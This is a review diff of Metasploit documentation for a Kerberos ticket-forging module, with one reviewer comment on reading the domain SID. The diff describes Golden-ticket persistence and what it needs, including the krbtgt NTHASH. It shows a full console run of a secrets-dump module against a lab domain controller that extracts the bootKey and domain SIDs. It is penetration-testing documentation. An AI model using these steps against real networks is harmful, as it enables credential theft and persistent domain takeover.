documentation/modules/auxiliary/admin/kerberos/forge_ticket.md

```diff
@@ -36,5 +38,174 @@ Any system leveraging kerberos as a means of authentication e.g. Active Director
 
 There are two kind of actions the module can run:
 
-1. **Forge_Silver** - Create a Silver ticket. [Default]
-2. **Forge_Golden** - Create a Golden ticket.
+1. **FORGE_SILVER** - Forge a Silver ticket. [Default]
+2. **FORGE_GOLDEN** - Forge a Golden ticket.
+
+## Scenarios
+
+### Forge Golden ticket
+
+Golden tickets can be used for persistance in an Active Directory environment. The forged golden ticket is actually a Ticket Granting Ticket (TGT) - which can be used to request arbitrary Service tickets. This module does not connect directly to a Key Distribution Center (KDC), it instead forges its own ticket.
+
+Golden tickets can be forged using a stolen Kerberos `krbtgt` account, using a password hash in NTHASH format.
+
+For golden ticket attacks the following information is required:
+
+1. `DOMAIN` - The domain, i.e.`adf3.local`
+2. `DOMAIN_SID` This is the Security Identifier for the system, i.e. `S-1-5-21-1266190811-2419310613-1856291569`
+3. `NTHASH` - The NTHASH for the krbtgt account, i.e. `767400b2c71afa35a5dca216f2389cd9`
+4. `USER` - This username will be stored within the forged ticket, this must be a user that exists in ActiveDirectory
+
+One way of extracting the krbtgt account NTHASH is to run the `auxiliary/gather/windows_secrets_dump` module:
+
+```
+msf6 > use auxiliary/gather/windows_secrets_dump
+msf6 auxiliary(gather/windows_secrets_dump) > run smb://adf3.local;Administrator:p4$$w0rd@dc3.adf3.local
+[*] Running module against 192.168.123.13
+
+[*] 192.168.123.13:445 - Service RemoteRegistry is already running
+[*] 192.168.123.13:445 - Retrieving target system bootKey
+[+] 192.168.123.13:445 - bootKey: 0xa03745c7a9597f105a4df1e84a5aef04
+
+... omitted for brevity ...
+
+[*] 192.168.123.13:445 - Decrypting NL$KM
+[*] 192.168.123.13:445 - Dumping cached hashes
+No cached hashes on this system
+[*] 192.168.123.13:445 - Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
+[*] 192.168.123.13:445 - Using the DRSUAPI method to get NTDS.DIT secrets
+[*] 192.168.123.13:445 - SID enumeration progress -  0 / 24 ( 0.00%)
+[*] 192.168.123.13:445 - SID enumeration progress - 24 / 24 (  100%)
+# SID's:
+ADF3\Administrator: S-1-5-21-1266190811-2419310613-1856291569-500
+ADF3\Guest: S-1-5-21-1266190811-2419310613-1856291569-501
+ADF3\krbtgt: S-1-5-21-1266190811-2419310613-1856291569-502 <------------- Use the SID from here
```

Comment:
The domain sid is everything to the left of the RID (the right most part after the last `-`). It doesn't necessarily need to be this one, you can see they're all the same in this output.